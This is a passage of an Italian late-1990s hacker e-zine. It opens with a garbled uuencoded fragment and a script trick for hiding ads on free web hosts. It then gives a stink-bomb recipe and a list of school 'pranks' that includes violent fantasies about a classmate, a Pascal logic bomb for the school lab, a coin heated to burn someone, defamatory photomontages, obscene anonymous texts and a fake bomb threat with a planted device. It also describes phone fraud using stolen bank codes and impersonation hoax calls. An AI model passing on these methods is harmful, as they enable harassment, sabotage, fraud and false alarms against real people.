M9FQA9W,`9F0`:&]L9`!B<VEZ90!B=69F97(`8W5R<`!I<W1E;7``=&]K96X` ` end sum -r/size 62952/15795 NOTA DI N0bodY88 = quando si dice buttare giu' un paio di articoletti in 2 ore... vero Master? mitico Master!!! ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COME ELIMINARE I BANNNER DALLE HP ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Metodo GENERICO per l'eliminazione dei banner dalle pagine web ottenute su i siti free. Attualmente alcuni server web che offrono spazi gratuiti abbastanza rilevanti o una tutta una serie di servizi molto interessanti tipo spree, server101 e fortunecity non si limitano ad applicare alle pagine create dai propri utenti i soliti banner e popup windows ma eseguono anche periodicamente dei controlli tramite una procedura automatizzata per verificare se le modifiche da loro inserite vengono in qualche modo hackerate. Lo scrivono loro stessi questo e direttametne assieme ai loro script come commento.. e vi assicuro che non scherzano. Alla prima infrazione in questo senso il sito e' eliminato senza troppi complimenti. Vengono eseguiti controlli specifici sulla presenza di comandi </NOSCRIPT> e in qualche caso (vedi spree e fortunecity) controllano anche la sintassi dei comandi dei vostri script per vedere se c'e' qualcosa che interferisce a livello di gerarchia degli oggetti che portrebbe inibire la visualizzazione dei loro banner. Nella maggior parte dei casi e' sufficiente inserire </NOSCRIPT> in maniera codificata (usando document.write(unasci(comandi codificati in ascii)))a seguito delle istruzioni di chiusura </HTML></HEAD></BODY></STYLE> ecc.. Ma non sempre e' utile .. cmq come avevo gia detto </NOSCRIPT> codificato ascii viene %3C%4E%4F%53%43%52%49%50%54%3E percui la procedura da inserire a fine codice html o di seguito ad un terminatore </qualcosa> e' a="%3C%4E%4F%53%43%52%49%50%54%3E" ; function b(){c=unescape(a);document.write(c);}b() Invece un metodo generico per la cancellazione lasciando inalterato il codice prodotto dal server e addirittura mantenendo sulla pagina i banner (che pero' diventano invisibili) e' quello di usare delle fasce di copertura con caratteri molto grandi. Il testo css unito al dhtml fornisce a questi caratteri una priorita' di visualizzazione piu' alta rispetto alla grafica percui sono in grando di coprire ogni cosa. (Anche le barre di scorrimento volendo!) E' possibile regolando in maniera appripriata la dimensione di un carattere <punto> o di un carattere "-" o altro coprire qualunque cosa di qualcunque dimensione in qualunque posizione si trovi all'interno della nostra pagina lasciando visibile tutto il resto. E' una specie di "toppa" che se viene colorata con lo stesso colore dello sfondo funziona egregiamente da cancellino. Un esempio. Allegata c'e' una pagina html com un banner (il gatto felix che va su e giu' preoccupato di diventare invisibile! ;-) ), e le poche righe di codice necessarie alla sua cancellazione. L'help all'interno della pagina htm sara di ulteriore aiuto. Sono valide le seguenti considerazioni: 1. La priorita' del testo rispetto al banner rimane invariata nel tempo percui anche se il codice extra medifica il banner, ad esempio cambiando pubblicita' ogni tot secondi, questo rimane comunque invisibile e senza sfarfallamenti: tutto avviene in background. 2. Il banner e' sempre presente, il server non puo' verificare la visibilita' di quest'ultimo ma controllandone la presenza 'fisica' tramite l'analisi della pagina quest'ultima risulta percui non ci sono problemi di -perdita free account-. Per vedere un esempio 'reale' di questo sistema controllare la pagina che ho aperto su spree: http://members.spree.com/education/csf0137. In questa ho eliminato il banner iniziale sormontandogli sopra una tripla serie di "I" molto grandi. Il banner finale (si poteva cancellare anche questo col sistema sopra) l'ho semplicemente spostato a destra di qualche metro rispetto al desktop [ ;-) ] aprendo un TABLE come ultima riga ..SENZA RICHIUDERLO con </TABLE> pero'.. ... <!-- ultima riga della pagina web da mettere su spree --> <TABLE BORDER=0 cellpadding=0 cellspacing=0 width=1000000> tutto cio' che verra' inserito a seguito di questa riga (sempre dal server) sara' un tag facente parte del table stesso.. e sara' centrato (con width=1000000) a 500.000 pixel a destra del browser, quindi abbastanza lontano da non essere visto. Master - Parsifal Supporti acclusi: Pagina di prova html : s.htm banner di prova : f.gif ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°Û°°°°°°°°°ÛÛÛ°°°ÛÛ°°°°°°Û°°°°°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°°°² ²°°°°°°°°ÛÛÛ°°°°°°°°ÛÛÛÛ°°ÛÛ°°°°°ÛÛÛ°°°°°ÛÛ²²²²Û°°ÛÛ°°°°°°ÛÛ°°°ÛÛ°°°ÛÛ°ÛÛ°°°°°² ²°°ÛÛÛÛÛÛÛ²ÛÛÛÛÛÛÛ°°ÛÛ°ÛÛ°ÛÛ°°°°ÛÛ²ÛÛ°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°°°² ²°°°°°°ÛÛÛÛÛÛÛ°°°°°°ÛÛ°°ÛÛÛÛ°°°ÛÛÛÛÛÛÛ°°°ÛÛ°ÛÛ°°°°ÛÛ°°°°°°ÛÛ°°°ÛÛ°°°°°Û°°°°°°°² ²°°°°°ÛÛ°°°°°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛ°°°ÛÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°°°°Û°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ STINKY BOMB ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ N.B. QUESTO FILE E' DA RITENERSI A TITOLO PURAMENTE INFORMATIVO, PERCIO' L'AUTORE, AVA666, DECLINA OGNI RESPONSABILITA' DALL'USO CHE POTREBBE ESSERNE FATTO. L'AUTORE, DUNQUE, NON INCORAGGIA CHI VOLESSE SERVIRSENE PER SCOPI ILLEGALI. <- DiScLaImErS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ IL POSSESSO DI QUESTO FILE E' COMUNQUE DEL TUTTO LECITO. <- PrEcIsAzIoNe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _____________ | STINKY BOMB | ("Special Edition" for NewBies) by AVA666 ~~~~~~~~~~~~~ Esistono altre bombe che non uccidono, che hanno pero' il loro bell'effetto, che sono anche facili da preparare. Una di queste e' la "Stinky Bomb", ovvero "Bomba puzzolente". Sinceramente ne esistono infiniti utilizzi... Comunque, esistono 2 principali ricette: #1 ammoniaca + zolfo = solfuro d'ammonio #2 solfuro di ferro + acido Entrambe fanno l'effetto 'uova marce' (soprattutto il #2) che prende alla gola e ti nausea all'estremo... come mi eccita... Vediamo come fare il primo tipo: /~~~~~~~~~~~~~~~~~~~\ < DI COSA HAI BISOGNO > \___________________/ - Un barattolo di vetro (e' piu' resistente - non vuoi che ti si rompa quando lo stai trasportando, vero?) - Dell'amoniaca - zolfo (si trova in erboristeria, in un consorzio agrario, ecc) Metti dell'ammoniaca nel barattolo di vetro e aggiungi dello zolfo. CHIUDI SUBITO! Bene, adesso agita il tutto... Vorrei essere molto lontano (e col vento a sfavore) quando qualcuno lo aprira... N.B. bastano piccole dosi per produrre quel bel 'profumino' - Eh eh eh <EVENTUALI UTILIZZI> Le Stinky Bomb possono essere utilizzate come una sorta di 'scherzo' per chi avra' la sfortuna di aprirle, oppure tirandole da qualche parte. <in realta', come ho gio' detto le possibilita' sono tantissime, per esempio:> Un'idea molto Simpatica e' quella di "cospargere" il tappo ed il contenitore con della colla o del vischio, cos• chi la apre dovra' lottare un pochino per richiudere il barattolo e sara' costretto a fare dei bei respiri... <oppure:> Potresti sostituire il contenuto di una boccetta di profumo con il composto della Stinky Bomb... <o ancora:> A scuola... Oh, esiste la scuola! (gia' purtroppo esiste...) Per fortuna che ci sei tu che 'movimenti' l'ambiente! - Luoghi in cui utilizzare la St. Bomb: - Bagno Andito Presidenza Segreteria Classe (se vuoi un modo sicuro per non fare lezione!) Palestra <e poi...> Usa l'immaginazione!!! P.S. La prima volta che ho respirato questa cosa e' stato BESTIALE! Mi ha "rincogXionito" subito! Per un attimo ho toccato il cielo (sembrava mi fossi sparato qualcosa) poi mi ha preso di colpo una nausea assurda! Questo testo fa parte del magico |\/| | | Y |~~> |~~ E R S O N A L /~~ \__ O O K B O O K del noto Anarchist Phreaker... /~\ \ / /~\ /___\ \ / /___\ / \ \_/ / \ =====> 6 6 6 <===== ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ :::::::::::::::::::::::::: | ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Titolo: Divertirsi a scuola ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ di : ElectroRipper ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Scritto il : xx/2/99 ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Pericolo: ÛÛÛ°°°°°°° ³ ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ; ElectroRipper - Divertirsi a scuola. -----------------------------------Mi scuso con Hell's Angel per aver copiato il suo stile di presentazione dell'articolo, ma ultimamente va molto di moda copiare quello di pIGpEN, io invece amo i classici :) Si si ! avete letto bene ! divertirsi a scuola si puo', se si ha fantasia e fegato. Anzi, se leggete questo articolo la fantasia non vi servira' nemmeno, cosi' l'unica cosa che serve e' un fegato (tanto con la nuova legge.... ;) Dunque, cominciamo con qualche scherzetto simpatico... C'e' sempre qualcuno che vi sta proprio, ma prooooprio sul cazzzzo!!! In classe mia questo qualcuno e' una ragazza che chiamero' Carlotta per non sporcare questo file con il suo vero nome, che io odio profondamente, spesso in classe mi viene voglia di prenderla a calci nei denti e spaccarle successivamente il cranio con una sbarra di ferro (non sto esagerando, voi non la conoscete). Questa mocciosa, infatti, e' odiosa, presuntuosa, bastarda, stupida, lecchina, brutta, secchiona (nel senso che studia 12 ore al giorno, ma poi ha i miei stessi voti, se non peggio), maleducata, antipatica, ignorante, senza alcuna virtu', sicura di avere sempre ragione, insomma, riesce a tirare fuori il lato peggiore di noi che dobbiamo per forza sopportarla 5 ore al giorno.... Uhm, dato che la prima idea (quella di prenderla a calci e sfondarle il cranio) non e' attuabile, faro' qualche scherzetto (eheheh) ! E' il bersaglio perfetto ! Anche voi, scegliete come vittima un essere che odiate con tutto il cuore (non avrete rimorsi e vi divertirete molto di piu' :) Insomma, ritornando a Carlotta, bisogna stare molto attenti, perche' appena scopre anche lo scherzo piu' innocente, come minimo ci denuncia ai carabinieri, dato che la sua ignoranza non le permette di confrontarsi direttamente con noi. Inoltre sa di essere odiata da tutti, quindi e' molto sospettosa... -Ma non disperiamo! Questo progetto che vi spieghero', infatti, non presenta nessun rischio (o quasi), e anche voi potrete ridere alle spalle della vostra 'Carlotta' Ecco cosa serve : - Guscio giallo della sorpresa dell'ovetto kinder - Alcool - Profumi vari In pratica si tratta di fare una bomba puzzolente mischiando 1/2 di profumi vari precedentemente mischiati tra loro, e 1/2 di alcool. SENZA ODORARE (se e' uscita bene e l'annusate non sarete mai piu' gli stessi :) versatela nel guscio giallo che avete preso dall'ovetto kinder, e recatevi a scuola. Quando state per uscire svitate il guscio, ma non apritelo completamente, in modo da farlo trovare in una situazione nella quale basterebbe un piccolissimo urto per farlo aprire... Stando attenti a non farlo aprire prima del dovuto, cercate di metterlo dentro la cartella della vittima (e' piu' facile di quanto si possa immaginare), cercando, se possibile, di farlo finire in basso, sotto ai libri. Appena si muovera' e qualche libro urtera' il guscio, se l'avete messo bene, si aprira' facendo fuoriuscire il puzzolentissimo contenuto :)))) -Una variante e' versare il liquido direttamente nella cartella, e' piu' divertente ed efficace, e inoltre potrebbe non capire mai cosa sia successo in realta', ma come capirete, e' anche piu' rischioso (ad ogni modo non fatelo durante la lezione, ma poco prima di uscire, o nei corridoi) -Un'altra cosa divertente e' buttare una crostatina mulino bianco o meglio un po' di marmellata (questo e' bello) nella cartella della vittima, durante la ricreazione, mentre non guarda. Mettetegliela sotto i libri o tra le pagine di un libro, dopo un po' trovera' una bella sorpresa :)))))))))) -Se invece e' un professore a starvi sul cazzo, allora e' ancora piu' semplice. Basta avere uno scanner e procurarsi una foto del professore. Con lo scanner e un programma di fotoritocco non ci vuole niente a fare un fotomontaggio. Ad esempio potete mettere la faccia del professore su un corpo preso da uno di quei giornaletti per gay con gli uomini nudi sopra, (ci sara' un gay nella vostra scuola : fateveli prestare da lui :) !!! Se invece si tratta di una professoressa e' ancora meglio, perche' per fare il fotomontaggio comprerete un giornalino di foto di DONNE nude, unendo cosi' l'utile al dilettevole :-D Una volta fatto il fotomontaggio fatene varie fotocopie (anche in bianco e nero, purche' si veda bene la faccia del professore) e disseminatele per i dintorni della scuola. -Mettete colla in tutte le serrature della scuola (compresa quella esterna, non si sa mai che riuscite a fare festa :) -Se la scuola ha un collegamento a internet cercate di procurarvi l'indirizzo di e-mail, poi non c'e' neanche bisogno che vi dica io cosa fare (le possibilita' che si aprono dinanzi a voi sono infinite....) -Utilizzando uno di quei servizi su internet per mandare small messages gratuiti e anonimi, mandate ogni giorno messaggi osceni sui telefonini alle vostre professoresse (potete divertirvi soprattutto con le zitellone racchie) -Mettete del sodio puro o del potassio puro in una capsula, buttatela nel gabinetto e tirate lo scarico. In un file di non mi ricordo chi, poi inserito nel cookbook di Jolly Roger, l'autore garantisce che puzzera' l'intera scuola. Non ho provato con il sodio puro perche' non l'ho trovato, quindi non posso garantirvi niente, ma vi dico subito di non provare con il potassio clorato o altra robba del genere, perche' l'ho fatto e non funziona... -Fate un fumogeno e accendetelo all'ingresso della scuola. -Stupida programmazione in Pascal e stupidi professori.... Non ci vuole niente a fare una bomba logica in Pascal. Quindi, se riuscite a finire subito il programma che dovevate fare, fate un programmino TSR e disponete in modo che venga chiamato all'avvio del sistema. Piu' tempo deve passare prima dell'"esplosione" piu' andrete sicuri. Se ad esempio andate nel laboratorio di informatica il martedi', allora fate in modo che esploda sabato (lunedi' sarebbe troppo sospetto). Se avete accesso ai programmi delle altre classi modificateli in modo da farli diventare offensivi per il professore. -Se siete arrivati in classe per primi avete l'occasione di giocare un simpatico scherzetto. Mettete una cento lire su una batteria da 9V in modo che tocchi entrambi i poli. Dopo 4-5 minuti con una matita fatela volare in una zona della classe dove dovrebbe essere vista dal coglione che sta arrivando. Una volta che la raccoglie potrete sentire le sue urla di dolore... (BURLONI!) Ecco in pratica quello che dovrebbe succedere : la cento lire viene caricata dalla batteria, che invece si scarica, diventando molto calda, e facendo diventare calda anche la 100 lire. Fatevi bene i vostri calcoli, perche' se la 100 lire si raffredda prima che la vittima la raccoglie, allora niente scherzo e niente urla di dolore. -Ecco una variante dello scherzo della 100 lire. Attaccate un filo elettrico a un polo della batteria e andate a scuola. Mentre non vi vede nessuno attaccate l'altro capo del filo all'altro polo e gettate !SUBITO! la batteria nel corridoio. Quando il bidello o (ma non oso sperare tanto) IL PRESIDE, la raccogliera', incazzato per il fatto che gli studenti non sappiano usare i cestini, potrete ridere, e ridere. Infatti a riscaldare la batteria e' il veloce flusso di elettroni tra i due poli, in questo caso permesso dal filo elettrico attaccato alla batteria (adesso sapete perche' in alcuni manuali di elettronica consigliano di non collegare mai i due poli di una batteria direttamente :) -Comprate molte uova. Fate un piccolo buco su ogni uovo, e lasciate tutto in un posto molto caldo per 3-4 settimane. Avrete cosi' una bella riserva di bombe puzzolenti. Prendetene un po', e insieme agli amici divertitevi a dare un nuovo look alla scuola, e soprattutto un nuovo odore :) (Meglio farlo di pomeriggio o di sera se la vostra scuola rimane aperta. Nella mia, ad esempio, si puo' passare dalla palestra.) -Come non parlare del classico falso-allarme bomba ??? Avviatevi da casa, fate la telefonata ai carabinieri da una cabina pubblica senza farvi notare da nessuno e !VELOCEMENTE! andate a scuola ! Se riuscirete ad arrivare subito a scuola avrete un buon alibi, dato che nessuno ricordera' il minuto e il secondo preciso nel quale siete arrivati, ma tutti potranno confermare che quando sono arrivati i carabinieri voi eravate gia' li' da un bel po'. -Ancora meglio (se non vi spaventa troppo) sarebbe nascondere il giorno prima della telefonata, nella scuola, qualcosa di non troppo pesante, come una molotov, o magari una bomba non funzionante (cioe' nel senso che lo farete apposta a farla difettosa, ma loro non devono saperlo). In tal modo c'e' la possibilita' che sospendano le lezioni per qualche giorno per indagare. ||| Ecco altre piccole cose che mi sono divertito a fare ...... - Ho preso il diario di un mio amico e nell'ora di educazione fisica (non la facciamo mai e non ricordo neanche che faccia abbia la prof) glielo abbiamo bruciato. - Una volta un mio amico e' andato in bagno durante il compito di tedesco. In pratica lo aveva gia' finito e lo avrebbe solo dovuto consegnare, ma lo ha lasciato sul banco, cosi' io gli ho cambiato tutte le parole aggiungendo lettere a capa di cazzo alla fine di ognuna. (questo l'ho fatto in seconda media, e con il professore che stava a due passi da me, quindi vuol dire che il rischio e' proprio poco). - Spesso mi diverto a cambiare i numeri degli esercizi per casa, sui diari dei secchioni della mia classe, stando attento a non far notare la differenza di calligrafia. E' alquanto spassoso vedere gente che studia fino alle 2 di notte arrivare a scuola e dover copiare i compiti dopo aver saputo che quelli che hanno fatto non erano quelli assegnati dal prof. - Con un mio amico ho scambiato tutti i tasti della tastiera di un computer della scuola, e a rompere quelli che non potevamo scambiare. Nella gioia del momento (e' sempre bello fare un danno alla scuola) non abbiamo tenuto conto che in tutto eravamo una decina di persone a usare quel computer, e non e' stato difficile capire chi era stato. Il professore si e' mooooooooooolto arrabbiato. - Ottenuto l'op su un canale di finocchi ho settato come topic : XXXXX XXXXXXX : Superdotato ma dolcissimo, chiamalo allo xxxx/xxxxxx (XXXecc. era il nome del mio professore piu' bastardo, e xxxx/xecc. il suo numero di telefono) ||| Ecco altre cose che altri miei amici si sono divertiti a fare ..... - Uno di classe mia, in prima, stufo dei soliti programmi in pascal del tipo inserisci l'area del triangolo, inserisci il cateto......ha fatto un programma alquanto offensivo che chiedeva di inserire "la formula di tua sorella", dopodiche' basandosi su un complicato "algoritmo" di sua creazione, ti diceva se tua sorella poteva essere sodomizzata o no. Successivamente il programma chiedeva se dovesse calcolare un'altra parente... Costui non aveva tenuto conto del fatto che il professore dal suo computer poteva controllarci tutti...Sgamato, con conseguente "discussione" con i genitori..... - Il mio prof fa pagare dalle 1000 alle 3000 lire a chi trova con una gomma da masticare in bocca. Un giorno tutti i miei amici hanno deciso di farsi trovare tutti con la gomma. Purtroppo cio' non ha avuto l'effetto sperato, e il professore ha voluto i soldi da tutti. Ecco. Mi sembra di avervi dato un bel po' di idee, no ? A scuola non dovreste piu' annoiarvi per i prossimi 2 o 3 mesi ;) ElectroRipper ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚ{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}¿º º³ COME FOTTERE I SOLDI AL VS VICINO IN MODO DEL TUTTO LEGALE ³º ºÀ{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}Ùº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ -----------------------------------------------------------------------------Io non mi assumo nessuna responsabilita' per l'uso improprio delle informa zioni contenute in questo testo, divulgato a solo scopo informativo per evitare che altre persone usino questo metodo x creare dei danni a voi. -----------------------------------------------------------------------------Avete letto bene e questo potrebbe essere possibile se si verificassero le seguenti condizioni: - avete in banca un po' di soldi (bastano anke 500.000); - riuscite a fottere un resoconto mensile spedito dalla banca al vs vicino; - conoscete un telefono pubblico, o una cabina dove non si sente che si sta chiamando da li' (quindi senza il rumore del traffico); Allora prima di tutto premetto che non ho mai provato questo metodo ma ho pensato a cio' che sto x proporvi a causa di uan discussione di due ultra sessantenni che stavano parlando oggi sull'autobus. Uno dei due stava dicendo all'altro di passare alla banca dove aveva i soldi lui, la XXX (non metto il nome non x privacy ma xche' non so che banca :P) e tra i vari vantaggi che gli stava elencando sentii che diceva la mitica frase "in questa banca ti offrono la possibilita' di comprare bot e vari titoli tramite il telefono, tu basta che chiami il numditel della XXX ti identifichi come Pinco Pallino, dici il tuo codice che viene riportato sul resoconto mensile inviatoti dalla banca..." e qui mi scappo' la brillante idea :)))) Mi direte poi in mail se pensate sia brillante o se credete sia na m... Allora una volta che voi riuscite a rubare l'estratto conto (o resoconto mesile) mandato dalla banca al vs vicino [ o a chiunque se ci riuscite e se tornate a casa prima di lui :) ] avete il suo numerino magico con il quale potete identificarvi e fare acquisti x lui (ma non fategli guadagnare se no dopo vi mangiate i coglioni...) ma a che pro direte voi? La risposta puo' essere scontata ma pensate un attimo a voi che comprate... diciamo 250 titoli a 20.000 lire (5.000.000) della SexyShop & C. ... e continuate a fantasticare ...per esempio (non sto facendo ipotesi...nooooooo) potreste che ne so... venderle il gg dopo a 2.000 ire l'una (500.000) e poi (sempre casualmente)chiamare la vostra banca e ordinare di comprare le azioni della SexyShop & C. (cazzo che caso) a max 2.000 lire cosa succederebbe secondo voi? Probabilmente il tizio a cui avete fottuto il codice si ritroverebbe con 4.500.000 lire in meno, e voi vi trovereste con 250 azioni pagate 2000 e vendibili sulle 20.000 :))))))) Certo (direte voi)e se la banca si compra le azioni al posto ns xche vede che sono convenienti? Be noi ci troveremo senza neanche una azione comprata xche nessuno le vendera' a 2.000 lire oltre a...noi e almeno avremo rotto le balle al tipo che ci stava sui coiones (e se non ci stava sui coiones..be...non so) RIPETO che non so se funzia con tutte le banche e di che tipo e' sto codice (abc 1a2b3c 12-34-56 o cosa) e poi si potrebbe obbiettare che se uno non ha chiesto il servizio x comprare i titoli via telefono non funzierebbe...oppure si potrebbe pensare che oltre un tot la banca non compra via telefono... Quindi a causa di tutto cio' vi consiglio di: - telefonare alla banca da una cabina e NON da casa vostra (chissa xche'...) - non chiamare la banca con una voce da ultra40enne se avete 16 anni... - non incolpare me se vi binano xche' ho fatto il disclaimer apposta :PPP Adesso vi lascio agli altri art. ma se provate questo metodo, se funziona o se non funziona fatemelo sapere... Byez N0bodY88 [email protected] ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ ::::::::::::::::::::::::::: | ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Titolo: Scherzi Telefonici ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ di : ElectroRipper ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Scritto il : xx/2/99 ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Pericolo: Û°°°°°°°°° ³ ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ; ______________ /___/------\___\ / \ |________| SCHERZI TELEFONICI di ElectroRipper ------------------------------------------------------------------------------Gli scherzi telefonici possono essere usati per fare impazzire o impaurire qualcuno che odiamo profondamente, oppure come semplice hobby (in questo caso pero' non bisogna rompere sistematicamente il cazzo a persone che non conosciamo, per non cadere nella bastardaggine pura). Passiamo a vedere vari tipi di scherzo..... - Il primo e' quello piu' scemo, usato soprattutto dai bambini, e consiste nel dire un insulto e poi posare la cornetta. Spero proprio che non sia anche quello preferito da voi, perche' se e' cosi' mi fate veramente schifo (CAZZO, SIAMO NEWBIES, NON DEFICIENTI CON COMPLESSI DI INFERIORITA') - Eccone uno un po' piu' divertente. Allora, chiamate la vostra vittima e.... Vittima ElectroRipper Vittima ElectroRipper Vittima : : : : Pronto ? Buongiorno Chi e' ? Sono un tecnico della telecom. Stiamo lavorando sulla sua linea. Se tra un po' sente il telefono squillare non alzi la cornetta, perche' questo potrebbe generare una corrente di fortissima intensita' verso la mia postazione : Ok, ho capito Posate, aspettate 2 minuti e poi richiamate, e lasciate squillare. Fate squillare finche' non risponde. Se ha preso veramente sul serio le vostre parole, continuate a chiamare finche' non sara' stufo di sentir squillare il telefono e alzera' la cornetta. A quel punto urlate piu' che potete nel telefono (cercando di farlo sembrare un urlo di dolore realistico). Anche se potrebbe sembrare una stronzata vi assicuro che lo farete cagare sotto (e d'altronde se avete recitato bene all'inizio non c'e' motivo per cui non dovrebbe pensare che a causa sua voi siete morti fulminati) -Questo non e' uno scherzo telefonico, ma uno scherzo "citofonico", ma e' lo stesso spassoso. In un citofono con i bottoni, premete tutti i bottoni. Cominciate una piccola conversazione con la persona che risponde per prima, e poi ci sara' da divertirsi (sempre che qualcuno non se ne accorge e scende per spaccarvi le ossa :) ElectroRipper preme tutti i bottoni..... Risponde Rossi.... Rossi ElectroRipper Rossi ElectroRipper : : : : Si ? Buongiorno, mi puo' aprire ? Ma lei chi e' ? Sono il postino Risponde Bianchi.... Bianchi Rossi Bianchi Rossi : Pronto ? : Mi dispiace non posso aprire il portone a chi non conosco, ultimamente ci sono stati dei furti : Come ??? Ma lei chi e' ? : Come chi sono ???? Ma sei scemo ? Rispondono Verdi e Neri... Verdi Neri Verdi Rossi Bianchi Rossi Neri : : : : : : : Pronto ? Si ? Chi e' ? Ma allora mi stai prendendo per il culo !! Andatevene o chiamo la polizia!! Vattene tu se no la chiamo io veramente la polizia! Se non la finite di sfottere altro che polizia, scendo e vi spacco il muso Verdi : A chi spacchi il muso stronzo ? Rispondono altri, e la faccenda diventa sempre piu' divertente.... -Uno scherzo che abbiamo fatto una volta a uno che sta nella mia stessa classe. In orario scolastico, facendo finta di stare male o di dover fare una telefonata a casa, o di andare in bagno, uscite dalla classe e andate ad un telefono (spero che ci siano le cabine telefoniche nella vostra scuola, se no la cosa diventa complicata, a meno che non abbiate un telefonino). Chiamate a casa di un vostro amico, sperando che almeno uno dei due genitori sia in casa, dite di essere il preside, e spiegate che un bidello ha trovato il figlio in bagno a masturbarsi. Ovviamente una cosa del genere "non puo' essere permessa in una scuola, e i genitori dovrebbero dare una giusta educazione sessuale al ragazzo". Eheh, nella migliore delle ipotesi il poverino dovra' passare la giornata ad ascoltare il padre che 